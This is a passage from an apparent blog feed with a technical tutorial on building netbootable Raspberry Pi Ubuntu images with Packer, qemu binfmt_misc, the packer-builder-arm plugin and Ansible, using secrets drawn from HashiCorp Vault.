<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Add post kernel install chmod</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">netboot</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">src</span>: <span style="color:#ae81ff">images/files/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/kernel/postinst.d/zzz-chmod-kernel-image</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;0755&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">when</span>: <span style="color:#ae81ff">hn_netboot == &#34;true&#34;</span>
</span></span></code></pre></div><p>The <code>zzz-chmod-kernel-image</code> file can also be found in the <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">GitHub Gist</a>.</p>
<p>This task installs a small script which will <code>chmod</code> the kernel image to be world-readable.
This is necessary because otherwise the TFTP server serving the kernel
image at boot time would not be able to access it, leading to a failed boot.</p>
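<p>The actual script is in the Gist; in spirit it is just a few lines along the following
pattern (a sketch only, assuming the usual Debian convention that <code>/etc/kernel/postinst.d</code>
hooks receive the kernel version and the installed image path as arguments):</p>
<pre tabindex="0"><code>#!/bin/sh
# Illustrative sketch of zzz-chmod-kernel-image (the real script is in the Gist).
# $1 is the kernel version, $2 the path of the freshly installed kernel image;
# make it world-readable so the TFTP server can serve it.
[ -n &#34;$2&#34; ] &amp;&amp; chmod 0644 &#34;$2&#34;
</code></pre>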
<p>This concludes the walk through my bootstrapping playbook. Putting all of these
tasks together into a playbook and running the Packer image template from
<a href="https://blog.mei-home.net/posts/rpi-netboot/image/">Part IV of this series</a> should net you
a Raspberry Pi image that boots with NFS as the boot partition and a Ceph RBD
volume as the root partition.</p>
<p>The next and final article in the series will be a short one about actually
deploying the image.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part IV: Using Packer and Ansible to create a Raspberry Pi Ubuntu Netboot Image</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/image/</link>
      <pubDate>Sat, 24 Sep 2022 01:49:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/image/</guid>
      <description>How to create a netbootable Ubuntu image for the Raspberry Pi 4</description>
      <content:encoded><![CDATA[<p>This is the fourth part of the Pi netboot series. Find the previous
parts from the introductory article <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">here</a>.</p>
<p>In this part of the series, I will go over using a combination of
<a href="https://www.packer.io/">HashiCorp Packer</a> and <a href="https://www.ansible.com/">Ansible</a>
to create an Ubuntu Linux image for a netbootable Raspberry Pi, using NFS for the
boot partition and a Ceph RBD as the root device.</p>
<p>The goal here is to show you how to set up Packer and what configuration is needed to
run an Ansible playbook in an <em>aarch64</em> image on a <em>x86_64</em> machine. While writing
the article, I realized that it had already gotten pretty long, so I will move
the description of the Ansible playbook as well as the final image deployment
to future articles.</p>
<h1 id="what-is-packer">What is Packer?</h1>
<p>HashiCorp&rsquo;s Packer is a tool to conveniently and repeatably create OS images.
It is mostly intended for creating VM images for the big cloud providers&rsquo; setups, but
as I have found, it also serves very well for creating Raspberry Pi images.</p>
<p>The idea is to provide a base image, in this case Ubuntu&rsquo;s Raspberry Pi
image, and then allow the user to define provisioning steps. These steps can be
executed for example as shell scripts or Ansible playbooks.
Packer&rsquo;s task is to actually launch the image and execute the <em>provisioners</em> in
it.</p>
<p>This does not just work for VM images; Packer can for example also serve as a build tool for
Docker images.</p>
<p>An example Packer file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">packer</span> {
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">required_plugins</span> {
</span></span><span style="display:flex;"><span>    docker <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>      version <span style="color:#f92672">=</span> &#34;&gt;<span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">7</span><span style="color:#960050;background-color:#1e0010">&#34;</span>
</span></span><span style="display:flex;"><span>      source <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;github.com/hashicorp/docker&#34;</span>
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;docker&#34; &#34;ubuntu&#34;</span> {
</span></span><span style="display:flex;"><span>  image  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu:xenial&#34;</span>
</span></span><span style="display:flex;"><span>  commit <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  name    <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;learn-packer&#34;</span>
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;source.docker.ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;shell&#34;</span> {
</span></span><span style="display:flex;"><span>    environment_vars <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;FOO<span style="color:#f92672">=</span><span style="color:#66d9ef">hello</span> <span style="color:#66d9ef">world</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    inline <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;echo Adding file to Docker Container&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;echo \&#34;FOO is $FOO\&#34; &gt; example.txt&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Here, the <code>source</code> describes the virtualization to use (Docker in this case)
and the source image. The <code>build</code> block then describes what to do once the
image (in this case a Docker container) has been launched. In this example,
a file is created inside the Docker container.</p>
<p>To actually build the image, first the workspace has to be initialized by
running <code>packer init .</code> in your working directory.
Then, execute the build, assuming the above example was pasted into a file
<code>docker-ubuntu.pkr.hcl</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build docker-ubuntu.pkr.hcl
</span></span></code></pre></div><p>This is a pretty simple example, just requiring Docker to be set up. So what
hoops do you have to jump through to run an <code>aarch64</code> image and execute things
(like the bash script in the previous example) in it?</p>
<h1 id="running-aarch64-images-with-qemu-and-binfmt_misc">Running aarch64 images with Qemu and binfmt_misc</h1>
<p>Our goal is to provision an image for a Raspberry Pi, that is an aarch64 image, not one for an
x86_64 host. So how do we do that on our (mostly, these days) amd64 daily drivers?</p>
<p>The answer: <a href="https://www.qemu.org/">Qemu</a>. In combination with the extremely
cool <em>binfmt_misc</em> Linux kernel feature.</p>
<p>Learning about this feature was another one of those <em>Whoa, Linux is so cool!</em>
moments for me.</p>
<p>To begin with, let&rsquo;s quote <a href="https://docs.kernel.org/admin-guide/binfmt-misc.html">the kernel docs</a>
again:</p>
<blockquote>
<p>This Kernel feature allows you to invoke almost (for restrictions see below) every program by simply typing its name in the shell. This includes for example compiled Java(TM), Python or Emacs programs.</p></blockquote>
<p>(I only now realized that this doesn&rsquo;t just work for Qemu stuff, but seemingly
also for e.g. compiled Java programs&hellip;)</p>
<p>So what it allows you to do is this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>wget https://releases.hashicorp.com/packer/1.8.3/packer_1.8.3_linux_arm64.zip
</span></span><span style="display:flex;"><span>unzip packer_1.8.3_linux_arm64.zip
</span></span><span style="display:flex;"><span>./packer version
</span></span></code></pre></div><p>And it will work. You will be able to execute aarch64 binaries without having
to prefix them with anything, let alone fire up an entire VM.</p>
<p>To configure <code>binfmt_misc</code>, first install <code>qemu</code> on the host. It is important
to ensure that static user binaries are enabled. In Gentoo, this is done with
the <code>static-user</code> use flag. In Debian, install the <code>qemu-user-static</code> package.
This is needed because the qemu binary will later be copied into the chroot of
whatever image you chose to use. And that image&rsquo;s shared libraries might be
wildly different than those installed on the system where you&rsquo;re running Packer.
A static binary just makes life simpler here.</p>
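<p>A quick way to check that you really ended up with the static variant (on Debian the binary
is called <code>qemu-aarch64-static</code>; on my Gentoo setup it is simply <code>qemu-aarch64</code>):</p>
<pre tabindex="0"><code>file /usr/bin/qemu-aarch64
# should report something like: ELF 64-bit LSB executable, x86-64, ... statically linked
</code></pre>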
<p>Next, the binary formats need to be configured, so the kernel knows how to run
a binary with a specific format. This is done through configuration in
<code>/proc/sys/fs/binfmt_misc/</code> files. On my Gentoo host, the file <code>/proc/sys/fs/binfmt_misc/qemu-aarch64</code>
looks like this:</p>
<pre tabindex="0"><code>enabled
interpreter /usr/bin/qemu-aarch64
flags: OC
offset 0
magic 7f454c460201010000000000000000000200b700
mask ffffffffffffff00fffffffffffffffffeffffff
</code></pre><p>These formats are normally registered automatically by the init system, with the
exact mechanism depending on the distribution.</p>
<p>You can test whether you configured everything correctly by downloading any
<code>aarch64</code> binary and trying to execute it on your host.</p>
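<p>For example, reusing the aarch64 Packer binary from above (the <code>file</code> call just confirms
that we really are executing a foreign-architecture binary):</p>
<pre tabindex="0"><code>file ./packer     # reports an ARM aarch64 ELF executable
./packer version  # runs anyway, via the registered qemu interpreter
</code></pre>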
<p>With this prerequisite fulfilled, we can continue to set up Packer itself.</p>
<h1 id="packer-setup">Packer setup</h1>
<p>Setting up Packer itself is pretty simple, as it is only a single Go binary.
You can either install it from your distro&rsquo;s package manager or download the
binary directly from <a href="https://www.packer.io/downloads">here</a> and move it to
someplace in your <code>$PATH</code>.</p>
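<p>For example, using the downloaded binary (the version number is just a placeholder; take
whatever is current on the downloads page):</p>
<pre tabindex="0"><code>wget https://releases.hashicorp.com/packer/1.8.3/packer_1.8.3_linux_amd64.zip
unzip packer_1.8.3_linux_amd64.zip
install -m 0755 packer /usr/local/bin/packer
</code></pre>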
<p>While Packer supports an <code>init</code> command, it is not required for our purposes.
Instead, we will manually install the <code>packer-builder-arm</code> plugin. This plugin
allows us to build aarch64 images via <code>chroot</code>.
The plugin can be found at <a href="https://github.com/mkaczanowski/packer-builder-arm">mkaczanowski/packer-builder-arm</a>.</p>
<p>As there are no binaries provided, the repository needs to be checked out and
built. This can be done with the following sequence of commands in the current
directory:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>git clone https://github.com/mkaczanowski/packer-builder-arm packer-builder-arm-src
</span></span><span style="display:flex;"><span>cd packer-builder-arm-src
</span></span><span style="display:flex;"><span>go mod download
</span></span><span style="display:flex;"><span>go build
</span></span></code></pre></div><p>This will create a <code>packer-builder-arm</code> executable. Copy that executable to your
future Packer workspace. If you would like to store the plugin in a more central
place, you can follow the instructions on the plugin directory in the <a href="https://www.packer.io/docs/configure#packer-s-plugin-directory">Packer docs</a>.</p>
<p>And with that, the setup is finally complete and we can get to the image creation
itself.</p>
<h1 id="finally-the-image-creation">Finally: The image creation</h1>
<p>To create images, Packer uses image template files. These template files are
described <a href="https://www.packer.io/docs/templates">here</a>, but in most cases, the
options are dictated by the builder and provisioners you are using.</p>
<p>Without further ado, here is the template file for my Raspberry Pi images. The
template supports both images for netboot and images for hosts with a local
disk.</p>
<p>Don&rsquo;t be overwhelmed, I will go through the different sections piece by piece. &#x1f609;</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_hostname&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hostname for the machine which uses this image.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_netboot&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">bool</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Should the host netboot or should it boot from a local disk?&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_host_id&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ID of the raspberry pi&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;mountpath&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/tmp/packer-${uuidv4()}&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;foobar-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/foobar&#34;, &#34;pw&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;hn_ceph_key&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/cephbar&#34;, &#34;key&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">source</span> <span style="color:#e6db74">&#34;arm&#34; &#34;ubuntu&#34;</span> {
</span></span><span style="display:flex;"><span>  file_urls <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/ubuntu-22.04.1-preinstalled-server-arm64+raspi.img.xz&#34;</span>]
</span></span><span style="display:flex;"><span>  file_checksum_url <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://cdimage.ubuntu.com/ubuntu/releases/22.04/release/SHA256SUMS&#34;</span>
</span></span><span style="display:flex;"><span>  file_checksum_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;sha256&#34;</span>
</span></span><span style="display:flex;"><span>  file_target_extension <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;xz&#34;</span>
</span></span><span style="display:flex;"><span>  file_unarchive_cmd <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;xz&#34;, &#34;-T0&#34;, &#34;--decompress&#34;, &#34;$ARCHIVE_PATH&#34;</span>]
</span></span><span style="display:flex;"><span>  image_mount_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${local.mountpath}&#34;</span>
</span></span><span style="display:flex;"><span>  image_build_method <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;reuse&#34;</span>
</span></span><span style="display:flex;"><span>  image_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}.img&#34;</span>
</span></span><span style="display:flex;"><span>  image_size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2.3G&#34;</span>
</span></span><span style="display:flex;"><span>  image_type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;dos&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;boot&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;c&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;2048&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;fat&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;256M&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/boot/firmware&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">image_partitions</span> {
</span></span><span style="display:flex;"><span>    name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>    type <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;83&#34;</span>
</span></span><span style="display:flex;"><span>    start_sector <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;526336&#34;</span>
</span></span><span style="display:flex;"><span>    filesystem <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ext4&#34;</span>
</span></span><span style="display:flex;"><span>    size <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;3.4G&#34;</span>
</span></span><span style="display:flex;"><span>    mountpoint <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  image_chroot_env <span style="color:#f92672">=</span> [&#34;PATH<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">local</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">usr</span><span style="color:#960050;background-color:#1e0010">/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">bin</span><span style="color:#960050;background-color:#1e0010">:/</span><span style="color:#66d9ef">sbin</span><span style="color:#960050;background-color:#1e0010">&#34;</span>]
</span></span><span style="display:flex;"><span>  qemu_binary_source_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>  qemu_binary_destination_path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/usr/bin/qemu-aarch64&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.arm.ubuntu&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--connection<span style="color:#f92672">=</span><span style="color:#66d9ef">chroot</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--inventory-file<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span>,<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--limit<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;imhotep_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_pi<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--user&#34;, &#34;ubuntu&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="variables">Variables</h2>
<p>The first part consists of input and local variables:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_hostname&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Hostname for the machine which uses this image.&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_netboot&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">bool</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Should the host netboot or should it boot from a local disk?&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">variable</span> <span style="color:#e6db74">&#34;hn_host_id&#34;</span> {
</span></span><span style="display:flex;"><span>  type <span style="color:#f92672">=</span> <span style="color:#66d9ef">string</span>
</span></span><span style="display:flex;"><span>  description <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ID of the raspberry pi&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;mountpath&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/tmp/packer-${uuidv4()}&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;foobar-pw&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/foobar&#34;, &#34;pw&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">local</span> <span style="color:#e6db74">&#34;hn_ceph_key&#34;</span> {
</span></span><span style="display:flex;"><span>  expression <span style="color:#f92672">=</span> <span style="color:#66d9ef">vault</span>(<span style="color:#e6db74">&#34;secret/cephbar&#34;, &#34;key&#34;</span>)
</span></span><span style="display:flex;"><span>  sensitive <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The Packer guide on variables can be found <a href="https://www.packer.io/guides/hcl/variables">here</a>.
The difference between <code>variable</code> and <code>local</code> is that a <code>variable</code>
is expected to be set from the outside, while a <code>local</code> is computed
within the template itself.
To decide which one to use, just ask yourself: Is this value going to change
between different Packer invocations or not?</p>
<p>My input variables are the following:</p>
<ul>
<li><em>hn_hostname</em> This is the name of the host I&rsquo;m currently creating</li>
<li><em>hn_netboot</em> Boolean determining whether the host is going to netboot or use a
local disk</li>
<li><em>hn_host_id</em> This field contains the host ID. In the case of the Raspberry Pi,
this is the serial number from <code>/proc/cpuinfo</code>.</li>
</ul>
<p>As you can see, all the input variables are things which will change from host
to host.</p>
<p>The local variables are mostly things which can be automatically gathered:</p>
<ul>
<li><em>mountpath</em> Just a random path in /tmp as a mount directory for chroot</li>
<li><em>foobar-pw</em> This variable uses Packer&rsquo;s <a href="https://www.packer.io/docs/templates/hcl_templates/functions/contextual/vault">Vault function</a> to collect a password from HashiCorp Vault. In this case,
it is the password for my Ansible user.</li>
<li><em>hn_ceph_key</em> Again Vault access, this time to get the Ceph auth key for access
to the root volume pool on the Ceph cluster</li>
</ul>
<p>You can of course use other functionality to get at your passwords in a convenient
way. The <code>sensitive=true</code> parameter tells Packer not to print the
value to any logs or to stdout.</p>
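<p>If you go the Vault route as well, note that Packer&rsquo;s <code>vault()</code> function reads the
standard Vault client environment variables. The following is only a sketch with placeholder
values; the address and the token file are assumptions, not part of my setup:</p>
<pre tabindex="0"><code># Packer's vault() function needs these environment variables to be set.
# Address and token source below are placeholders for illustration.
export VAULT_ADDR=&#34;https://vault.example.com:8200&#34;
export VAULT_TOKEN=&#34;$(cat ~/.vault-token)&#34;
packer build ...
</code></pre>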
<p>The input variables can be passed to the Packer invocation in several
different ways. The first one is via the command line, like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>packer build -var <span style="color:#e6db74">&#34;foo=bar&#34;</span> ...
</span></span></code></pre></div><p>The one I chose is via variable files. These files should have the <code>.pkrvars.hcl</code>
file extension. They look like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;mypi&#34;</span>
